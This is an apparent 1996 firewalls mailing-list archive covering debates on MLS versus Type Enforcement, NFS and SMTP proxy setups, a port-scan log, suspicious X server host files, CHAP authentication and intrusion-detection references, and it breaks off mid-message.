Feb 96 09:04:35 -0500 Message-Id: <9602021404.AA18008@mordred.sware.com> Subject: Re: Mandatory protection (was: product selection) To: smith@sctc.com (Rick Smith) Date: Fri, 2 Feb 1996 09:04:35 -0500 (EST) From: Charles Watt Cc: firewalls@greatcircle.com, smith@sctc.com, watt@sware.com In-Reply-To: <199602012355.RAA16089@shade.sctc.com> from "Rick Smith" at Feb 1, 96 05:55:26 pm X-Mailer: ELM [version 2.4 PL21] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > Charles Watt writes: > > >Actually, Rick, your analysis below does show a lack of > >understanding in the capabilities of most MLS systems. Your > >analysis assumes that the MAC labels enforced by such systems > >are strictly hierarchical, e.g.: > > Excuse me, but I doubt you could do any of this without categories > and/or compartments. I am surprised that you could infer their absence > from that message. MLS couldn't come even close to competing with type > enforcement if it lacked non-hierarchical labels. > > >Here your understanding of MLS networking breaks down. Read > >the existing standards, such as RFC 1108 or the DoD's Common Security > >Label spec. > > Naturally I've read various IPSO specs. > > Labeled IP is largely irrelevant to the firewalls marketplace today, > and I suspect they will remain so for the next few years (perhaps an > interesting topic for a different thread). We sell very, very little > to sites that use labeled IP protocols. Most people need to > interoperate with standard hosts operating without IPSO labels. Rick, either everyone else on this list with experience in MLS systems is incapable of explaining a point clearly, or you have an amazing ability to ignore their points in your zeal to promote the Sidewinder and Type Enforcement (TE). But then, you are marketing, right? Reread my message. It had nothing to do with labeled IP. It simply used the security features provided by a typical MAC-enforcing protocol stack to duplicate the features of a system based on TE. No labels for network data required. Does this work? Of course. Our SecureWeb platform (www.secureware.com/papers/secureweb/) makes use of MAC to create the only platform truly secure enough for high value electronic commerce -- we have banks on the web today offering full-service accounts to their customers through the SWP. And when we ran our own "challenge" at the Retail Delivery Show in November (I take no responsibility for such disgusting marketing drivel), we at least had the confidence to offer a Trans Am convertible rather than a T-shirt to any successful attacker. And we gave all participants direct root access to the system (in the "outside" partition, of course). > >Now I'm not an expert on Type Enforcement, but we do have a couple > >of ex-SCC developers here. We've discussed the pros/cons of > >TE vs. MLS at length for quite some time and have come to the conclusion > >that ANYTHING that can be done with TE can also be done with MLS and > >vice versa. Of course the architectures are different, and some > >problems fit more naturally with one or the other approach. But the > >capabilites are virtually identical, particularly when applied to > >firewalls and similar separation problems. > > The bottom line is, of course, that both are forms of mandatory access > control. We all agree on that point. (Hi, Barry). > > Rick. > smith@sctc.com secure computing corporation Fine. You've got a nice system. Its use of TE-based MAC gives it some definite competitive advantages over those systems that do not use MAC, if integrated and administered properly. But TE provides no advantage over a similar system based on MAC, such as the Harris firewall. There you must compete based upon other features, such as better application support or ease of administration. Charles Watt SecureWare, Inc. From firewalls-owner Fri Feb 2 10:38:38 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA11873 for firewalls-outgoing; Fri, 2 Feb 1996 10:29:07 -0800 (PST) Received: from mprgate.mpr.ca (mprgate.mpr.ca [134.87.131.13]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA11851 for ; Fri, 2 Feb 1996 10:28:12 -0800 (PST) Received: from edzo.mpr.ca by mprgate.mpr.ca with SMTP id AA07683 (5.67b+/IDA-1.5 for ); Fri, 2 Feb 1996 10:25:19 -0800 Received: by edzo.mpr.ca (4.1/SMI-4.1) id AA23441; Fri, 2 Feb 96 10:26:39 PST Date: Fri, 2 Feb 96 10:26:39 PST From: igood@mprgate.mpr.ca (Ian Good) Message-Id: <9602021826.AA23441@edzo.mpr.ca> To: Firewalls@GreatCircle.COM Subject: NFS services and firewalls Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Good morning (PST). We have a requirement to provide a network mountable filesystem in a shared developement environment between the firewalls of ours and another company. Our developement team requests that this file system be mountable inside our firewall. Following is our proposed configuration. All of the NFS traffic between the server and the two companies should pass through the firewall. We are trying protect the server as much as possible by putting it behind the firewall but still not inside; i.e, not on the same "side" of the firewall as the rest of the company. _________ us -------|_ fw-1 _|--------- them NFS clients | \ / | NFS clients |__\___/__| __|___ | NFS | |server| |______| Under this configuration is it possible for 'us' to achieve a high level of security for our internal network under this configuration. We understand that FW-1 v2.0 makes it possible to selectivly pass NFS (v2) traffic through the firewall. We would make the server as secure as possible with almost no logins, functionally limited to the main task of serving NFS and only NFS mount connections permitted incoming from them. From our side to the server appropriate outgoing access for management and NFS client connections. Can anyone comment on this configuration and the exposures inherrant in it? How easy is it for someone to compromise internal hosts via the NFS server? If there is a serious problem with this, would using NFS (v3) significantly improve things? Ian H. Good (604) 293-5113 igood@mpr.ca MPR Teltech Ltd. fax (604) 293-5787 http://www.mpr.ca/ Burnaby BC Canada V5A-4B5 From firewalls-owner Fri Feb 2 10:56:53 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA12554 for firewalls-outgoing; Fri, 2 Feb 1996 10:51:46 -0800 (PST) Received: from uu6.psi.com (uu6.psi.com [38.145.155.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA12549 for ; Fri, 2 Feb 1996 10:51:42 -0800 (PST) Received: from va.arca.com by uu6.psi.com (5.65b/4.0.071791-PSI/PSINet) via UUCP; id AA14947 for ; Fri, 2 Feb 96 13:43:59 -0500 From: williams@va.arca.com (Jeff Williams) Reply-To: williams@va.arca.com To: Firewalls@GreatCircle.COM Subject: Firewall API's Date: 02 Feb 1996 17:46:49 GMT Message-Id: <256176126.339531179@va.arca.com> Organization: Arca Systems, Inc Sender: firewalls-owner@GreatCircle.COM Precedence: bulk We're in the middle of a firewall selection effort and we need some help. We're wondering whether or not it is common practice to provide an API so that we can create our own proxy applications if we want to. At least one vendor has said "No way". Is it reasonable to expect such an API with a firewall product? What's the best way to find out which ones do or do not? Thanks in advance for any help, --Jeff From firewalls-owner Fri Feb 2 11:16:30 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA12293 for firewalls-outgoing; Fri, 2 Feb 1996 10:41:16 -0800 (PST) Received: from real.com ([199.97.122.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id KAA12287 for ; Fri, 2 Feb 1996 10:41:12 -0800 (PST) Date: Fri, 2 Feb 1996 18:42:42 GMT From: bret@real.com (Bret McDanel) Received: by real.com (8.7.3/3.2.012693-Realistic Technologies); id SAA04935 for firewalls@greatcircle.com; Fri, 2 Feb 1996 18:42:42 GMT Message-Id: <199602021842.SAA04935@real.com> To: firewalls@greatcircle.com Subject: Re: Scanning from afar... X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Has anyone seen this type of network scanning before? Addresses have been > changed to protect the inocent and the guilty. > > Jan 30 11:14:41.922: %SEC-6-IPACCESSLOGP: list 111 denied tcp > X.X.143.14(39620) -> X.X.211.227(80), 1 packet > > The node in question here has scanned a few other subnets looking for > connections to port 80. Is this a recognised scanning program or something > home grown? > It looks like someone is scanning for HTTPD.. Maybe someone is really anxious to read your web pages :) From firewalls-owner Fri Feb 2 11:27:53 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA13063 for firewalls-outgoing; Fri, 2 Feb 1996 11:06:55 -0800 (PST) Received: from relay3.UU.NET (relay3.UU.NET [192.48.96.8]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id LAA13058 for ; Fri, 2 Feb 1996 11:06:49 -0800 (PST) Received: from maestro.Maestro.COM by relay3.UU.NET with SMTP id QQabfg23307; Fri, 2 Feb 1996 14:05:52 -0500 (EST) Received: by maestro.Maestro.COM (4.1/MAESTRO-0.1/07-03-93) id AA14540; Fri, 2 Feb 96 13:55:22 EST Date: Fri, 2 Feb 1996 13:55:21 -0500 (EST) From: Sick Puppy To: firewalls@GreatCircle.com Subject: Re: Scanning from afar Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Looks a bit similar to ICMP redirect packets, which are basically telling your router that the shortest route to one system is through another system (where some kewl d00d usually waits for your packets). A lot of lamers can't tell the difference between a router and a firewall so they hit the firewall with router tewlz. Definitely ! 3L33T. (Not elite, lamer.) I was watching some d00d from .my doing this kind of stuff, but he was elite and kept seeing me watch him. Each time I connected to his system he baled out. Don't care anyway. It don't matter that a dawg don't know where .my is. Sick Puppy, the Cat_Eating_Dawg Photonic & Tachyonic Systems Engineer of the Stealth Starship Dark Matter -=:( Chained, whipped, beaten and severely abused in Hillary's Dungeon ):=- -=:( Yeah, tha'ts it, beg Mother Newt ):=- Stop it Bill. NO Bill. Ooooh Bill. Yes Bill. Right there Bill. (Gotcha. Bill was only stroking the cat) From firewalls-owner Fri Feb 2 11:33:26 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA12642 for firewalls-outgoing; Fri, 2 Feb 1996 10:54:42 -0800 (PST) Received: from solen.gac.edu (solen.gac.edu [138.236.1.6]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA12624 for ; Fri, 2 Feb 1996 10:54:25 -0800 (PST) Received: from gac.edu (guenther@lunen.gac.edu [138.236.128.17]) by solen.gac.edu (8.6.12/8.6.12) with ESMTP id MAA12094; Fri, 2 Feb 1996 12:49:12 -0600 Message-Id: <199602021849.MAA12094@solen.gac.edu> To: Prakash N Purushotham cc: "'firewalls@greatcircle.com'" Subject: Re: X#.hosts in /etc directory In-reply-to: Your message of "Fri, 02 Feb 1996 09:23:00 PST." <31124A6A@gangotri.mindware.soft.net> Date: Fri, 02 Feb 1996 12:49:10 -0600 From: Philip Guenther Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Prakash N Purushotham writes: >Yesterday when I was backing up my DNS databases and Mail databases, >I found several instances of files with names > >X0.hosts, X1.hosts .... X7.hosts > >All these files were created on 27 Jan, 1996 (Saturday, nonworkingday) >with nearly same time-stamps. > >Could this mean that my network is under attack? I did not find >anything suspicious in the syslog and sulog files. Your machine probably is under attack. To quote the Xserver manpage: The X server also uses a host-based access control list for deciding whether or not to accept connections from clients on a particular machine. If no other authorization mechan- ism is being used, this list initially consists of the host on which the server is running as well as any machines listed in the file /etc/Xn.hosts, where n is the display number of the server. The file contains either an Internet hostname (e.g. expo.lcs.mit.edu) or a DECnet hostname in double colon format (e.g. hydra::). Each hostname must be newline separated with no leading or trailing whitespace. For example: joesworkstation corporate.company.com star:: bigcpu:: Users add or remove hosts from this list and enable or dis- able access control using the xhost command from the same machine as the server. If those files contain any hostnames, you are susceptible to X connections from those hosts. Remove the files and restart your Xserver immeadiately. Philip Guenther ---------------------------------------------------------------- Philip Guenther UNIX Systems and Network Administrator Internet: guenther@gac.edu Phonenet: (507) 933-7596 Gustavus Adolphus College St. Peter, MN 56082-1498 Source code never lies (it just misleads). (Programming by Purloined Letter?) From firewalls-owner Fri Feb 2 13:27:11 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA17118 for firewalls-outgoing; Fri, 2 Feb 1996 12:53:45 -0800 (PST) Received: from dcb01a.cwi.net (dcb01a.cwi.net [205.136.1.65]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id MAA17113 for ; Fri, 2 Feb 1996 12:53:37 -0800 (PST) Received: (from chris@localhost) by dcb01a.cwi.net (8.6.9/8.6.9) id PAA07595; Fri, 2 Feb 1996 15:52:42 -0500 Date: Fri, 2 Feb 1996 15:52:42 -0500 From: Chris Eastman Subject: proxy smtp To: firewalls@greatcircle.com Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Earlier there was a post about a socks-type smtp relay client, basically what I want to do is have an external machine for mail only, and have the forward all traffic for a particular domain to an internal NT machine, anyone have any suggestions as to which proxy type application to use for this? %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% Christopher Eastman %% Cable & Wireless, Inc %% %% MDS Network Engineer %% 1919 Gallows Road %% %% chris@cwi.net %% Vienna, VA 22182 %% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% From firewalls-owner Fri Feb 2 13:27:24 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA16995 for firewalls-outgoing; Fri, 2 Feb 1996 12:50:21 -0800 (PST) Received: from relay1.smtp.psi.net (relay1.smtp.psi.net [38.8.14.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id MAA15254 for ; Fri, 2 Feb 1996 12:17:47 -0800 (PST) Received: from adpmail.adp-es.com by relay1.smtp.psi.net (8.6.12/SMI-5.4-PSI) id PAA08800; Fri, 2 Feb 1996 15:16:50 -0500 Received: from ccMail by adpmail.adp-es.com (IMA Internet Exchange 1.04b) id 1126f930; Fri, 2 Feb 96 15:09:55 -0500 Mime-Version: 1.0 Date: Fri, 2 Feb 1996 14:58:05 -0500 Message-ID: <1126f930@adp-es.com> From: jtriana@adp-es.com (Jorge Triana) Subject: Help with Sun-OS/Raptor Firewall To: firewalls-digest@GreatCircle.COM Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Description: cc:Mail note part Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'm hopefule of 2 things: First- I'm posting to right area(if not, nicely tell me where to go) Secondly- Hope someone can help!!!!! I have a Raptor Eagle 3.0 firewall running on a Sun SparcStation 2.0 running SunOS 4.1.4, (SOLARIS VERSION COMING SOON). The machine has two token ring cards, one for each of the net sides, unprotected and protected). On the protected internal network side, I have a cisco router that is my gateway to the rest of the internal network. I am running IGRP in the internal network and also RIP on that router so that all my routing tables are redistributed into the ring where the Sun is connected to. On the unprotected side going to the internet, I have another cisco router running rip and going out to the rest of the world. My problem is such: From the SUN workstation, I can ping to the outside world, internet and such with out a problem. I have routes to the rest of the world. I can't however, ping anything beyond my directly connected devices that are on the protected ring. That is, any other subnet that is not directly connected to the subnet where the sun is, is not accessible. Doing a netstat -rn shows only the two directly connected subnets, the loopback and the default router entry. I'm not running any DNS or YP or BIND on this machine or anywhere else. I have an /etc/domainrouter entry with it being the router going to the internet. (IF I change and make the default router the oine going to my internal network, then I can ping internally, but nothing out in the internet). If I have to default router entry, then it starts routed and things really get interesting. (SEE BELOW) I have a sniffer on the protected ring and I see the RIP route broadcasts eminating from the cisco router into the ring. I dont' see the SUN doing anything but exchanging MAC address information. There is no RIP traffic coming from the SUN workstation. (I thought that SUN w/stations normally run RIP to formulate their routing tables!!) I have done the following with the following results: - Removed the default router entry.... Doing this, causes routed to start. Before routed starts, there is no traffic eminating from the workstation. As soon as I type routed -q and hit enter, the workstation gets over 100 rip-devired routes to him forwarded by the router. The sun box shows the entries when a netstat -rn command is entered. After approx 1 minute, the routing tables are flushed in the sun and only 24 routes are kept. These 24 routes are being sent by the router every 30 seconds as part of the RIP update. The sun never seems to acknolwedge the route packet, so the route keeps sending the same. The only time that the SUN workstation is caching the routes is when the routed command is issued, and then the routes are flushed after 1 minute. I have added static route to the inside network with no sucess. Does anybody have any ideas? Please reply to jtriana@adp-es.com..... Thanks...for any help.. From firewalls-owner Fri Feb 2 13:57:43 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA16961 for firewalls-outgoing; Fri, 2 Feb 1996 12:50:05 -0800 (PST) Received: from uustar.starnet.net (uustar.starnet.net [199.217.253.12]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA14535 for ; Fri, 2 Feb 1996 11:52:56 -0800 (PST) Received: from hq.UUCP by uustar.starnet.net with UUCP id AA13519 (5.67b/IDA-1.5 for greatcircle.com!firewalls); Fri, 2 Feb 1996 13:41:13 -0600 Received: (from daemon@localhost) by hq.agedwards.com (8.6.9/8.6.9) id NAA03023 for firewalls@greatcircle.com.outbound; Fri, 2 Feb 1996 13:30:43 -0600 Received: from igate.agedwards.com (igate.agedwards.com [159.45.56.11]) by hq.agedwards.com (8.6.9/8.6.9) with ESMTP id NAA03019 for ; Fri, 2 Feb 1996 13:30:41 -0600 Received: from Microsoft Mail (PU Serial #1093) by igate.agedwards.com (PostalUnion/SMTP(tm) v2.1.8c for Windows NT(tm)) id AA-1996Feb02.132500.1093.27907; Fri, 02 Feb 1996 13:27:17 -0600 From: nicholscs@agedwards.com (Nichols,Christopher) To: firewalls@greatcircle.com ('SMTP: firewalls@greatcircle.com') Message-Id: <1996Feb02.132500.1093.27907@igate.agedwards.com> X-Mailer: Microsoft Mail via PostalUnion/SMTP for Windows NT Mime-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Organization: A.G. Edwards & Sons Inc. St. Louis Date: Fri, 02 Feb 1996 13:27:17 -0600 Subject: CHAP Authentication Sender: firewalls-owner@GreatCircle.COM Precedence: bulk This is a general security related question relating to incoming communications into a router. Specifically a remote user dialing into a router attached to an applications server. I have to make an argument comparing/contrasting the security levels between CHAP authentication and Token Authentication. The argument has been successfully made that Token authentication is generally considered to provide superior authentication. From a management viewpoint the question becomes - CHAP is basically free (manhours and implementation) vs. Token which can be expensive - therefore tell us why CHAP is inferior to Tokens for perimeter security? What threats does CHAP pose? Has CHAP been successfully penetrated? By what methods? I have read the RFC's on PPP and Authentication but am still unable to apply this to a real world threat. Thanks, Chris nicholscs@agedwards.com From firewalls-owner Fri Feb 2 14:11:40 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA16934 for firewalls-outgoing; Fri, 2 Feb 1996 12:49:41 -0800 (PST) Received: from vent.pipex.net (vent.pipex.net [158.43.128.5]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA03424 for ; Fri, 2 Feb 1996 05:48:48 -0800 (PST) Received: from unknown by vent.pipex.net (8.6.12/PIPEX simple 1.20) id NAA01067; Fri, 2 Feb 1996 13:46:46 GMT Message-ID: To: Firewall List MIME-Version: 1.0 From: Ian Johnstone-Bryden Subject: Re: Mandatory protection (was: product selection) Date: Fri, 02 Feb 96 11:55:29 GMT Content-Type: text/plain; charset=US-ASCII; X-MAPIextension=".TXT" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Reading the exchange on Multi Level Security vs Type Enforcement the two factors which come out strongly are the vendor vested interests and the way DOD does things. Vendor vested interest is understandable. If anyone invests time and money in working with a particular architecture they should believe in what they are doing and have a strong opinion, right or wrong. Where the vendor is a hardware supplier, the primary interest is in selling the hardware. The software component is just a means to an end. In todays environment of cloned product, open systems (UNIX), and quazi open systems (Microsoft), it can be tough differentiating a hardware product. Some of the small hardware vendors have followed a series of attempts to sell product by packing Ada, or real-time UNIX, or today firewall software in the hope that this will enable them to sell well designed and manufactured hardware which happens to be rather more costly than commodity product in their field. If that helps them sell tin, good luck to them. OTOH maybe they need to take a hard look at what they are trying to achieve, how they are costing product, and how they are trying to market it. In some cases they would have achieved greater success by ceasing hardware production and developing their software skills, but then so few organisations spend time creating the enterprise policy which makes them question and review against a prime objective. Vendor vested interest aside, how US DOD does things does not decide how technology can be best employed to solve specific problems in specific cases. It doesnt even mean that a US DOD approach is the best option even within DOD. When TCSEC was developed, it was originally intended to form a general computing standard, but it just happened to become a government mechanism and ended up more as a US Federal G procurement mechanism than a method of addressing risk. Because of organisations like NATO, TCSEC got exported and particular countries, like the UK, found that it didnt do everything they felt they needed. Result was they set up they own systems, but based them on TCSEC in recognition that much of their computer hardware, if not their software, came from US based corporations that handled trusted products through their Fed Sales teams. Although there have been many invitations down the years, the general IT industry and commerce have failed to participate strongly in the development of computer security criteria. Thats resulted in criteria being written mainly in government and academic language. In turn that makes it very easy for people to try to think within the constraints of someone else's box - but you dont have to. The application of technology can be more important than the technology. After all IBM didnt conceive the technology of the PC just to make Bill Gates rich. That happened because Bill saw some opportunities and ruthlessly pursued them. If we take the time to look back through history, some of the greatest advances have been made by applying technology in ways which the original developer never intended. MLS was originally designed for a specific perceived government need and directly related to the heirarchical structure of government classification systems. The weakness of that approach in commercial applications is that much traditional government business is done within that organisation and even within a sub-set. DOD shares a classification system with the rest of the US Government but may apply it differently. It may also deal with other external organisations like NATO and UK Government. Theoretically the classification system is universal. In reality it isnt. The US and UK Governments continue to confuse each other by using similar classification terms to mean different things and having some unique classifications. Even in simplified examples, classification is not truly heirarchical. A data item classified 'Secret' is not available to every person who is cleared to read up to and including 'Secret'. Even within the classification, everyone in a particular division cleared at that level doesnt get access and different data items at 'Secret' have different sensitivities. MLS just reflects that set of requirements. Not all systems which meet B1 levels and have MLS capability to meet the MAC requirements work in exactly the same way. Every firewall should be built to meet the specific requirements of the organisation it serves to protect. Therefore two firewalls might employ the same basic technology but be configured very differently. Some government users employ gateways with MLS type technology where the technology simply provides two compartments which are protected from each other. Moving data from one compartment to the other is under manual control and there are only two conditions - untrusted public and trusted internal sensitive. Other users employ the technology, together with additional technology, to allow a level of automation but still have only two levels. Some users employ the same technology in a largely automated manner where several levels apply on both sides of the wall. In all these cases the systems could be described as firewalls, only one of them really employs MLS widely, but all of them make use of the fact that the technology has been extensively tested through independent evaluation and active penetration testing and has a known behaviour. In most cases, the certification of components is only one part of the measurement and site accreditation has been employed to ensure that the complete system (and that means all of the procedures and the administration) complies with a carefully analysed risk assessment and risk policy. In commercial application, and increasingly in government applications for that matter, one problem is that two or more people may need to exchange sensitive data but do not use the same classification systems. For example, a corporation may have its own classification system which includes lables like 'Company Confidential'. It needs to exchange data with another enterprise which may also use the same lables but use the labels in a very different way and mean very different things. Equally, it might not even use the same terms in any way. Evaluation criteria assume that classification is under a central control and common through all linked systems and their links. If not the only data exchange permitted is at 'Unclassified'. Once 'Unclassified' data has been moved internally to a classified level, it can only move down again if the security officer declassifies it. Therefore in a firewalling sense, data is received from an external source at 'unclassified' but is then moved into a work area at 'Company Confidential'. The internal user then wants to respond by email but is stopped by the system because he is attempting to take what is now classified data to an unclassified only destination. To achieve transmission, the internal user has to permit the security officer to decide if an exception can be granted. Where the technology is very useful is that all of this process is tracked by the trusted audit system. If in the process General Motors discloses highly sensitive information to Ford Motor Company because a security officer made the wrong decision, it is possible to identify who was responsible and when. Given that information damage limitation may be possible and sanctions can reduce the probability of the situation being repeated. In a situation such as the example, it would not make sense to build a firewall which automatically allowed classified data to pass automatically from A at 'Company Confidential' to B at 'Company Confidential'. That does not mean that a firewall with MLS technology is inappropriate. It just means that the designers and administrators have to decide how they should use the technology and also why they should use it. A number of military systems over the years have failed because someone decided to specify B1 certified product because X% of data was classified at 'Secret'and assumed that that was all they needed to do. MLS can be employed to cover the same applications as TE and TE can cover applications covered by MLS. Which you choose depends on your own detailed assessment of need. Which product containing MLS you choose also depends on your assessment of need and factors like cost. How you implement MLS also depends on your requirements. The fact that the technology allows you to set a number of classification and sensitivity levels doesnt mean you have to do it that way. You would typically employ at least two levels in a firewall but you could use many more and they dont have to match on both sides. One use is to take data from the untrusted public domain into a protection compartment. You might then have it move into a sanitation compartment where it is automatically checked for hostile code. If it looks hostile, someone decides what to do with it and it only moves from there under manual control. It is still on the 'outside', but you already have two compartments. Automatic transfer across the primary barrier may be nothing more than a method of saying the data has been checked for obvious risks but is still untrusted. OTOH you could extend the use of the technology with combinations of system or manual checks to create an MLS environment inside. You may also be able to pass data in and out between known external addresses using the label system you use internally and this may include the use of other mechanisms to provide a level of protection (such as encryption) to the data as it transits the public untrusted networks. The choices are almost unlimited. This makes a real risk policy an essential. Alternatively you can take a simple firewall approach and assume inside is trusted and outside is untrusted but that will one day give you an unpleasant surprise. Ian J-B ========================================= Ian Johnstone-Bryden, Rayzarb Associates Tel: +44 (0)1986 782418 Fax: +44 (0)1986 782525 Email: gq50@dial.pipex.com +++++++++++++++++++++++++++++++++++++++++ Latest book by Ian Johnstone-Bryden "Managing Risk", Avebury Imprint ISBN 1 85972 255 5 Library of Congress CICs No. 95-79002 ========================================= From firewalls-owner Fri Feb 2 14:25:50 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA16865 for firewalls-outgoing; Fri, 2 Feb 1996 12:48:12 -0800 (PST) Received: from gw3.att.com (gw4.att.com [204.179.186.34]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA20793 for ; Thu, 1 Feb 1996 08:50:02 -0800 (PST) Received: from vodka.sse.att.com (vodka.gc.att.com) by ig4.att.att.com id AA04337; Thu, 1 Feb 96 11:41:46 EST Message-Id: <9602011641.AA04337@ig4.att.att.com> From: mdr@vodka.sse.att.com Subject: Intrustion Detection References for all To: firewalls@greatcircle.com Date: Thu, 1 Feb 1996 11:48:28 -0500 (EST) X-Mailer: ELM [version 2.4 PL23-upenn2.7] Mime-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Since I received so many requests for the results of my query I decided to reply to the general list. My future posting about this subject will be done to ids@uow.edu.au where I should have originally posted. I deleted a few responses that were personal invitations from individuals because I thought that it would be inappropriate to post those to the list. Many Thanks again to those who responed. Mark Riggins Secure Systems Engineering AT&T Bell Labs ==================================================================== Hi, > On Mon, 22 Jan 1996, Fred Cohen wrote: > I do know DIDS. It is not a commercial product and is not generally > available. It does an admirable job, but it is resource intensive (cpu > cycles, disk space, and operator and analyst time). Even if it were > available, it would not be a solution for very many sites. How does one obtain it? > However, Phillipe Langlois > mentioned one developed in France. Perhaps he could summarize this > product for our edification?? IDERS is a product (under permanent improvement) which collects data from numerous probes at various subsystem (network, file system, process use, commands, data contained in files...). The probes report data to a central program which try to make clear and understandable reports. It tries to detect fuzzy attack which are not often detected with normal tools). IDERS is a commercial _service_, it's not sold but installed for our clients as a tool for our security service. PhiL. -- Philippe Langlois INTRINsec - Securite informatique Philippe.Langlois@INTRINsec.com - http://www.INTRINsec.com ==================================================================== From: "Lisa M. Jaworski" Content-Type: text Content-Length: 339 Status: RO Mark, I just received info from SAIC regarding its intrusion detection product. It's called CMDS (Computer Misuse Detection System) & the POC is Paul Proctor (proctor@mls.saic.com). The marketing literature comes with a slew of paperwork, including a paper on audit recuction & misuse detection in heterogeneous environments. Lisa J. ==================================================================== From: Mark_W_Loveless@smtp.bnr.com Message-Id: <9600298229.AA822944324@smtp.bnr.com> To: mark.riggins@att.com Subject: Re: intrusion detection Content-Type: text Content-Length: 1229 Status: RO Try the alt.2600 FAQ via anon ftp at rtfm.mit.edu /pub/usenet-by-group/alt.2600 There is a fairly complete list of hacker hangouts, security newsgroups, mailing lists, and a ton of web links (assuming the latest version is out there, it was recently updated in the last couple of months). Bear in mind it is written from the perspective of the guys you want to keep out of your system. ==================================================================== From: Alan Dowd To: mark.riggins@att.com Subject: Re: intrusion detection In-Reply-To: <9601252031.AA04494@ig1.att.att.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Content-Length: 1391 Status: RO Greetings, Mark! The obvious, obvious is Fred Cohen's web site. One may not like the way he posts, but he does do a lot of consulting work on intrusion detection/prevention. I don't have his URL handy, but he writes to Best of Security and posts the URL in his sig block. Other obvious, obvious is NCSA - the security folk at www.ncsa.com, not the super-computer folk. There is a list of maillists at http://www.iss.net/iss/maillist.html - Intruder Detection is described there. Good Luck, -- Alan Dowd Phone: +1 612 628 1641 Secure Computing Corporation FAX: +1 612 628 2701 2675 Long Lake Road URL: http://www.sctc.com Roseville, MN 55113-2536 E-Mail: dowd@sctc.com -- ==================================================================== From: "Lisa M. Jaworski" Content-Type: text Content-Length: 319 Status: RO Mark, Are you familiar with the work that Teresa Lunt was doing when she was at SRI? She is now a Program Mgr at ARPA (try lunt@arpa.gov but I'm not sure if that's right.) Also, Christopher Klaus cklaus@iss.net. SAIC has a product out now, too. Check out their web pages for more info & a POC. Take care, Lisa J. ==================================================================== From: Torsten Sturm Organization: CSD, Univ. Erlangen-Nuernberg, Germany X-Mailer: Mozilla 2.0b5 (X11; I; SunOS 4.1.3 sun4m) Mime-Version: 1.0 To: mark.riggins@att.com Original-Cc: firewalls@greatcircle.com Subject: Re: intrusion detection References: <9601252031.AA04494@ig1.att.att.com> Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Content-Type: text/plain; charset=us-ascii Content-Length: 1034 Status: RO The COAST Projects are somewhat dedicatied to various flavours of intrusion detection and are always a good starting point ! http://www.cs.purdue.edu/coast/coast-tools.html HTH, Torsten -- InfoSec webpage : http://www.rrze.uni-erlangen.de/~unrzg3/security/security.html __________________________________________________________________ http://wwwcip.informatik.uni-erlangen.de/user/tnsturm/index.html ==================================================================== From: Torsten Sturm Organization: CSD, Univ. Erlangen-Nuernberg, Germany X-Mailer: Mozilla 2.0b5 (X11; I; SunOS 4.1.3 sun4m) Mime-Version: 1.0 To: mark.riggins@att.com Original-Cc: firewalls@greatcircle.com Subject: Re: intrusion detection References: <9601252031.AA04494@ig1.att.att.com> Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=us-ascii Content-Length: 1034 Status: RO The COAST Projects are somewhat dedicatied to various flavours of intrusion detection and are always a good starting point ! http://www.cs.purdue.edu/coast/coast-tools.html HTH, Torsten -- InfoSec webpage : http://www.rrze.uni-erlangen.de/~unrzg3/security/security.html __________________________________________________________________ http://wwwcip.informatik.uni-erlangen.de/user/tnsturm/index.html ==================================================================== From: Darren Reed Subject: Re: intrusion detection To: mdr@vodka.sse.att.com Date: Mon, 29 Jan 1996 21:19:39 +1100 (EDT) In-Reply-To: <9601261408.AA24513@ig2.att.att.com> from "mdr@vodka.sse.att.com" at Jan 26, 96 09:09:02 am X-Mailer: ELM 